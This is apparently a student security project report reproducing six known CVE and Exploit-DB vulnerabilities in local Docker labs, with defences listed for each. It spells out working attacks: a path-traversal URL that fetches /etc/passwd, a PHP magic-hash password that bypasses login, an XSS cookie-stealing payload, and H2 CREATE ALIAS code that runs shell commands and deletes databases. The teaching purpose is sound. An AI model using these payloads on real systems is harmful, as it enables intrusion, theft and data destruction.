# NCS Final Project
### Contributors: 
* Mariia Charikova (cases 4, 5) 
* Igor Krasheninnikov (cases 2, 3) 
* Roman Solovev (cases 1, 6)
### Repository with scripts and precise instructions available [here](https://gitlab.com/rsolovev/ncs_final/).

### Videos available [here](https://drive.google.com/open?id=1NOKg9v49pm7mlx3mxyfBgZm0diqa9_Na). For better video quality watch separate case videos.


---

## Case #1

**CWE-ID**: 20: Improper Input Validation  
**EDB-ID**: 48297  
**CVE-ID**: 2020-11455  
**CVSS score**: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**Attack Surface**:  
[LimeSurvey](https://www.limesurvey.org/) is a free and open source on-line statistical survey web app written in PHP, based on a MySQL database. Available as docker image [here](https://hub.docker.com/r/martialblog/limesurvey/). It enables users using a web interface to develop and publish on-line surveys, collect responses, create statistics, and export the resulting data to other applications. Versions prior to 4.1.11 (released just 2 month ago) were vulnerable to Improper Limitation of a Pathname to a Restricted Directory (or simply, directory traversal) due to the Improper Input Validation.

**Scenarios Description**:  
LimeSurvey is used to run surveys and collect statistics of them. Not only the admin could run surveys, but also other users with moderator privileges. There exist a function - FileManager within the application to see local files and import/export surveys, statistics, etc. Every user with permissions to run surveys can use this function. By itself, filemenager GUI does not let you see the directory tree, only folders of local LimeSurvey storage:  
![](https://i.imgur.com/jePIwJb.png)  
But `path` parameter does not sanitize or validate provided path to file, thus leading to directory traversal and arbitrary file download.

**Vulnerability description**:  
A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey due to the Improper validation of a path supplied - it is not sanitized or validated. That allows an attacker to download arbitrary files from machine running LimeSurvey. The file manager functionality will also delete the file after it is downloaded, allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file (in case of docker instance of LimeSurvey it is not reproducible, as permissions are configured correctly within image).

**Environment preparation**:  
1. start mysql docker container:
`docker run --name some-mysql -e MYSQL_ROOT_PASSWORD=secret -e MYSQL_USER=limesurvey -e MYSQL_DATABASE=limesurvey -e MYSQL_PASSWORD=secret -d mysql:5.7`
2. start LimeSurvey instance:
`docker run -d -p 80:80 --name some-limesurvey --link some-mysql:mysql -e DB_PASSWORD=secret -e ADMIN_PASSWORD=foobar  martialblog/limesurvey:4.1.11_200316-apache`
3. Wait for both containers to start and verify that instance is accessible by simply going to http://localhost/  

> *NOTE: please do not change credentials or ports, as instruction and exploit relies on them*


**Exploits steps**:  


You can perform exploit manually:
1. Go to http://localhost/index.php/admin/authentication/sa/login
2. Login using credentials: `{username: admin, password: foobar}`
3. Go to http://localhost/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
4. Path in LimeSurvey's filemanager is not validated and sanitised,
    thus you will see download window for `/etc/passwd` file
5. Download it and verify that content is retrieved


Or you can run automated exploit:
1. Just run
       `python3 ls_exploit.py`
2. The content of `/etc/passwd` will be printed
       (script just automatically performs steps described in manual exploit)

**Defense mechanisms**:
1. As issue was discovered not long time ago, the best defense mechanism is to update your LimeSurvey as soon as possible.
2. As every moderator-privileged user might exploit this, if you are running versions <=4.1.11, you need to double check which people have this privileges and restrict suspicious moderators.

**Difficulties faced**:

- LimeSurvey is big "almost enterprise" system, so it was rather hard to find right configurations to build and start it locally.
- CVE for this vulnerability is quite new, so there was no supporting material or available exploit to start with.

**Conclusion**:  
Personally for me, exploiting this one was the most interesting experience, as vulnerability is quite new and LimeSurvey is the largest and most used app for online statistical surveys. The filmanager function was introduced not long time ago (with v.4 as far as I can tell), thus people are discovering security issues within it only now, thus more vulnerabilities dedicated to LimeSurvey might appear soon. The most interesting part of this vulnerability is that every person with right to create surveys is able to use filemanager function, thus admin might not even notice that all his files on a machine running LimeSurvey are downloaded.


## Case #2

**CWE-ID**: CWE-121: Stack-based Buffer Overflow  
**EDB-ID**: 43979  
**CVE-ID**: None  
**CVSS score**: 9.2 (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H)


**Attack Surface**:  Bochs IA-32 Emulator provides a virtual PC that can run operating systems such as Windows, Linux, and BSD. It supports emulation of the processor(s) (including protected mode), memory, disks, display, Ethernet, BIOS and common hardware peripherals of PCs. There is a stack-based buffer overflow issue in version 2.6-5. There you can find the link to the docker container with vulnerable version of this app: [Dockerhub image](https://hub.docker.com/repository/docker/grizzly1143/case02).

**Scenarios Description**:  Bochs has usual command line arguments that attacker can use to cause the buffer overflow that will proceed to the crash of this app.
This is how non crashing app looks like:

![](https://i.imgur.com/3ahQSYB.png)

Input argument overflow:

![](https://i.imgur.com/O40crFS.png)

**Vulnerability description**:  The size of the input argument in not defined and not limited. Because of that attacker can get out of the stack cell where input is located and with help of this he can rewrite neighbour stack cells and execute arbitrary code in the context of the application. Also failed exploits leads denial-of-service condition.

**Environment preparation**:
1. If you cloned our repo build provided docker image: `docker build -t case02 ./`, that contains bochs 2.6-5 installed. Also python2 is installed to run the exploit script.
2. Run image: `docker run -d -t --name case02 case02`
3. Go inside the container: `docker exec -it case02 /bin/bash`

> **Note**: If you pull our image from dockerhub follow the instructions from dockerhub Readme.

**Exploits steps**: 
1. Get into exploit folder.
2. Execute python script: `python exploit.py`. This script will generate necessary buffer and pass it to the app that will lead to DoS.

**Defense mechanisms**: 
* Use latest version of the app.
* Use languages that don't allow direct memory access.
* Check input size.
* Check limits of the target buffer.  

**Difficulties faced**:
* It's hard to find vulnerable application version 

**Conclusion**:  
During finding this app, I saw that there are a lot of issues connected with buffer overflow. Every month hundreds of exploits are found. Not only small apps are affected by this issue. Sometimes in huge apps developers forget to check buffer size that can lead to many problems. For example sudo was affected by this vulnerability. Moreover this issue is very dangerous, because attackers can modify the stack and also cause the Denial of Service. Also this issue was discovered in 2019, that is interesting because this version of the app was released in 2012.


## Case #3
**CWE-ID**: 1219: File Handling Issues  
**EDB-ID**: None  
**CVE-ID**: 2019-20005  
**CVSS score**: 6.2 (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)


**Attack Surface**:  
ezXML is a C library for parsing XML documents. It has been developed for parsing XML configuration files or REST web service responses. There is the file handling issue in version 0.8.6 and older ones. The image of vulnerable version of the library is available here: [Dockerhub image](https://hub.docker.com/repository/docker/grizzly1143/case03). 

**Scenarios Description**:  
Here you can see the example of small XML file which can be parsed using ezXML library:

![](https://i.imgur.com/GiFNiNr.png)

Such file is parsed normally.

![](https://i.imgur.com/6cZC9J7.png)

But we can also give the following XML file to the library:  

![](https://i.imgur.com/wkOSYch.png)

and if library start to parse this document, it leads to system crash (Segmentation Fault):

![](https://i.imgur.com/OhZrgAV.png)


**Vulnerability description**:  
The function ***ezxmldecode***, while parsing a crafted XML file, performs incorrect memory handling, leading to a heap-based buffer over-read while running **strchr()** starting with a pointer after a '\0' character (where the processing of a string was finished).

**Environment preparation**: 
1. If you cloned our repo build docker image that provided: `docker build -t case03 ./`, that contains already built C app that uses this library. .
2. Run image: `docker run -d -t --name case03 case03`
3. Go inside the container `docker exec -it case03 /bin/bash`

> **Note**: If you pull our image from dockerhub follow the instructions from dockerhub Readme.

**Exploits steps**: 
1. Go to exploit folder in the container
2. Go to the build folder
3. There you can see already build and compiled app that you can use writing `./Exploit` to your command line. This app will firstly read non-broken .xml file and show that library is working and than send broken .xml file and the app will crash with a Segmentation fault.

**Defense mechanisms (for the developer)**:
* Use error handling techniques (for example, set errno to 0 at the time of initializing a program and check it after the file parsing process). 

**Defense mechanisms (for the administrator)**:
* Use the newer versions of the library (for example 9.* )


**Difficulties faced**:
* There was no vulnerability available on exploitdb and it was difficult to find the source code.
* There was a problem with CMake dependencies in the source code, we have fixed them.


**Conclusion**:   
During discovering this vulnerability I mentioned that there is not a lot of file handling issues in command line apps. But there are a lot of web apps that have such issues. I faced a lot of problems with a building of this app, because I don't used cmake so much before. Also I mentioned that this issue was mentioned on CVE website in 2019 but this version of library was written 9 years ago.


## Case #4
**CWE-ID**:	1211: Authentication Errors  
**EDB-ID**: 47989   
**CVE-ID**: 2020-8547  
**CVSS score**: 6.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)

**Attack Surface**:  
[phpList](https://www.phplist.org/) is software for sending email newsletters, marketing campaigns and announcements. phpList is used via a web browser and installed on your server. Version 3.5.0 and elder ones have authentication bypass vulnerability. Vulnerable version of the application you can find [here](https://gitlab.com/rsolovev/ncs_final/-/tree/master/case04).

**Scenarios Description**:  
For example, admin set the string `TyNOQHUS` as password for username `admin` (its sha256 value is `0e66298694359207596086558843543959518835691168370379069085300385`).

Now `admin` can authenticate not only with password `TyNOQHUS`, which is valid, but also with `34250003024812`, which is invalid but has the same SHA256 value if php will compare these numbers using `==` comparison.

Using such vulnerability, hachers can use brute-force to get the password, and it will be much easier than just try all possible combinations.

**Vulnerability description**:  
Php loose comparison `==` compares two operands by converting them to integers even if they are strings.

For example the following code:  

![](https://i.imgur.com/c6hoBgf.png)

has output:  

![](https://i.imgur.com/ZVclcRv.png)

There is a vulnerable code in the file `public_html/lists/admin/phpListAdminAuthentication.php` : 

![](https://i.imgur.com/CA0ENgA.png)



**Environment preparation**:  
1. Clone the repository:  
`git clone https://gitlab.com/rsolovev/ncs_final.git`
2. Go to the *case04* folder:   
`cd ncs_final/case04`
3. Copy the .env-dist file and save it as .env in your current folder:  
`cp .env-dist .env` 
4. Check *.env* file (it should looks like this):
```MYSQL_ROOT_PASSWORD="somerootpassword"
MYSQL_DATABASE=phplistdb
MYSQL_USER=phplist
MYSQL_PASSWORD=phplist
PHPLIST_ADMINNAME="Your Name"
PHPLIST_ADMINPASSWORD="TyNOQHUS"
PHPLIST_ADMINEMAIL=YourEmail@Yourdomain.com
PORT=8123
HOSTNAME=localhost
```
5. Run:
`./start-phplist.sh` to start the container
6. Wait some time, because the first time the database will be created and configured
7. Then container will be ready, you can access the service in the web browser:  
`http://localhost:8123/lists/admin/` 

**Exploits steps**:  
1. Check that the string `TyNOQHUS` set as password for username `admin`. Enter the system with these credentials.
2. Logout from the application.
3. Try to login with username `admin` and password `34250003024812`.
4. You will be logged in, without valid password.


**Defense mechanisms (for the developer):**
* use strict comparison (`===`) in place of loose comparison.

**Defense mechanisms (for the administrator):**
* use latest versions of the application (for example, the latest version has no such vulnerability)

**Difficulties faced**:
* There is no image and instructions to vulnerable version of application on DockerHub. That is why we have docker-compose in the repository.
* Changing of environment values don't affect the app(e.g. port, admin password).

**Conclusion**:  
As I know vulnerability with comparison in php is a common issue among web developers. Brute-forcing such collisions is one of a common techniques for hacking applications which requires authentication. So, it is very good that such vulnerability has a simple mechanism for defence. 

## Case #5

**CWE-ID**: 1217: User Session Errors  
**EDB-ID**: 41749  
**CVE-ID**: None  
**CVSS score**: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)  


**Attack Surface**:  
[inoERP](http://www.inoideas.org/) is a PHP-based open source enterprise management system. Available as docker image: [here](https://hub.docker.com/r/systemsector/inoerp). Versions released before 08.05.17 (date patch 0.6.1 was introduced) were vulnerable for Cross-Site Scripting. It also has session fixation issue (before and after successful login id of session remains the same). 

**Scenarios Description**:  
inoERP is an Enterprise Resource Planning (ERP) application, where one of the features is customer support in the forum, where everyone can leave their own question or topic for discussion. It is important to note that new posts on the forum are published automatically and immediately, without additional checks by the administrator.

Web application has vulnerable field "Content" (Create a new Question in the --> Forum --> Ask a question). We can insert any XSS script to this field and publish it as a question on forum. 

When the published question on the forum open, this script will be executed.

**Vulnerability description**:  
The inoERP software lacks in input validation resulting in different XSS vulnerabilities. So, special characters are not filtered, their replacement with safe ones is not applied. It is mostly about brackets <>, in which all html-requests and tags reserved by the language are registered.

**Environment preparation**:  
1. Pull docker image  
`docker pull systemsector/inoerp`
3. As inoERP is available as docker image with vulnerable version, we can simply recreate it locally:  
`
docker run -i -t -p 80:80 systemsector/inoerp
`  
2. Then we can just access it by url:  http://localhost/inoerp/



**Exploits steps**:  
We have XSS:  
`<script>alert(document.cookie)</script>`  

And the following shell script (*case02.sh*):  
`curl -I 'http://localhost/inoerp/index.php/"--></style></script><script>alert(document.cookie)</script>' | grep PHPSESSID`

Manual exploit:

1. Access the service in browser by url:
`http://localhost/inoerp/`
2. Go to the forum:
`http://localhost/inoerp/content.php?content_type=forum`
3. Ask a question:
`http://localhost/inoerp/content.php?mode=9&content_type=forum&category_id=7`
4. Add any title of the new question and insert the following (or any other) XSS to the content field:
`<script>alert(document.cookie)</script>`

![](https://i.imgur.com/V6laK1X.png)

5. Post a "question"
6. If you see that document is successfully posted, you can click on the view
7. You will see the alert with document cookies:
![](https://i.imgur.com/35UtJ2a.png)

Automatic exploit:

1. Check access to the service in browser by url:  
`http://localhost/inoerp/`
2. Run the following script: 
`./case02.sh`
3. You will get the id of the session:

![](https://i.imgur.com/6ZRzMMb.png)


It may be implemented without authentication and directly from the start page because latest questions are included in it.


**Defense mechanisms (for the developer):**
* Do not accept session identifiers from GET / POST variables
* Utilize SSL / TLS session identifier
* Generate a new session identifier on each request. Even though an attacker may trick a user into accepting a known SID, the SID will be invalid when the attacker attempts to re-use the SID.

**Defense mechanisms (for the administrator):**
* Use newer versions of inoERP (for example, latest version is not vulnerable to XSS).
* Do not allow system to post questions and discussions to the forum automatically, check them locally before posting.

**Difficulties faced**:
* There is no CVE for this vulnerability, thus it was not easy to find a vulnerable version of the application.

**Conclusion**:  
Vulnerabilities that are associated with a user session very often do not exist in applications alone. In the inoERP, I found a session fixation issue just because I tested the script to steal cookies many times and saw that the session ID does not change even when I authenticate with different credentials. I also read about some other vulnerabilities in this application that are also related to the user session.

## Case #6

**CWE-ID**: CWE 1214: Data Integrity Issues  
**EDB-ID**: 44422  
**CVE-ID**: None  
**CVSS score**: 8.8 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**Attack Surface**:  
[H2](https://www.h2database.com/html/main.html) - relational database management system written in Java. Available as docker image: [here](https://hub.docker.com/r/oscarfonts/h2/). Versions released before 29.03.18 (date patch was introduced) were vulnerable for reverse shell. Using '*Alias*' SQL command there was an ability for arbitrary shell code execution through database console interface.

**Scenarios Description**:  
H2 provides a console to manage databases, and on start by default it creates a ‘test’ database that requires no password to access and modify it:
![](https://i.imgur.com/0mp7U5a.png)

By itself, this database do not provide any useful information, but through it we can get a reverse shell to the container to delete (or corrupt) all the other databases files and also clear the data from RAM (as H2 is in-memory storage, it is important to clear it too - there will be no possibility to back up data from RAM).

**Vulnerability description**:  
H2 has ‘*CREATE ALIAS*’ function, basically, you can create an function on H2 that calls a java code. There is a way to execute system commands with java, thus we can execute any arbitrary shell commands. This can be used to alter/delete data from H2 instance including all databases on the system. Thus, Data Integrity can be violated.

> *NOTE: this is not a web application vulnerability, but DBMS issue, we just use web console to connect to it, we can connect to it directly, but it will be rather harder to show and set up.*

**Environment preparation**:  
As H2 is available as docker image with vulnerable version, we can simply recreate it locally:  
`docker run -d -p 1521:1521 -p 81:81 --name=MyH2Instance oscarfonts/h2:1.4.197`  
The default database we need will be created automatically, and no further actions needed.  
Wait for container to start and save the container id somewhere

**Exploits steps**:  
All we need to know to successfully manipulate data on H2 instance is its IP and port of console and database itself. Then, using python script, we create an alias for shell execution using SQL statement:  
`CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws   java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : "";  }$$;`  
and then execute shell commands simply passing as parameter SQL commands. Example:  
`CALL EXECVE('uname -a')`:

But of course we can use shell prompt not only to retrieve system data, but also modify/corrupt or delete it. My exploit wipes all databeses and data on them and brings down a container H2 is running on with 3 simple steps:
```bash=
rm -r ../h2-data # Delete all .db files
pgrep java # Find PID of running java
kill -9 pid # Kill running java to bring down container 
            # and wipe all data from RAM
```
After the last step, container goes down and after its recreation, there will be no database files and loaded states in RAM (as container was stopped from within). Even if the database folder was mounted to some host directory, files will be also deleted from host.

Step-by-step instruction on how to launch the database and implemented exploit is in provided repository, or simply here:

1. Run db population script using command:  
    `
    python3 h2_populate_db.py
    `
2. Navigate to http://localhost:81 in your browser and click '*connect*'
3. Verify that table is created by typing in the command window in console  
    `
     SELECT * from test;
    `
    and click 'run' in left upper corner
4. See that content of 'test' database is shown with some random info
5. Leave the console and run the exploit:  
    `
    python3 h2_exploit.py
    `
6. Script will report ubnormal connection abortion, and that is normal, as firstly it connects to the database, creates alias for shell commands and then brings down the container, causing connection abortion.
7. You can check that the container is actually dead:  
    `
    sudo docker container ls
    `
8. If you saved the hash number (id) of container (printed on the start), you can restart it using:  
    `
    sudo docker container restart CONTAINER_ID
    `
9. Now you can verify that all the data was wiped from the container memory by visiting http://localhost:81 again and checking that no table is available

For manual PoC you will need to perform a lot of actions, thus I recommend to use scripts for db population and exploit.

**Defense mechanisms**:  
There are some common techniques to prevent this types of attack:
1. Do not use old versions of H2 
2. Always delete default database (or at least close access to it)
3. Change username and password for database admin pannel
4. Change default exposed ports of console and database itself

**Difficulties faced**:
* There is no CVE id for this vulnerability, thus it was not easy to find a version of H2 vulnerable to this
* Default exploit from Exploit-DB was not suitable for my purposes and I had to rewrite it

**Conclusion**:  
I was really surprised to see this vulnerability only discovered in 2018, as it is quite simple to recreate and use on real production databases. Although, it requires the default database to be up and running, but it is quite common to see such databeses left with no attention to them, leaving you system vulnerable for complete destruction and database alternation. Even if the database is up and running inside some private network, unprivileged users with access to it might recreate it to successfully exploit and wipe out the databases or alter them with fake databases.

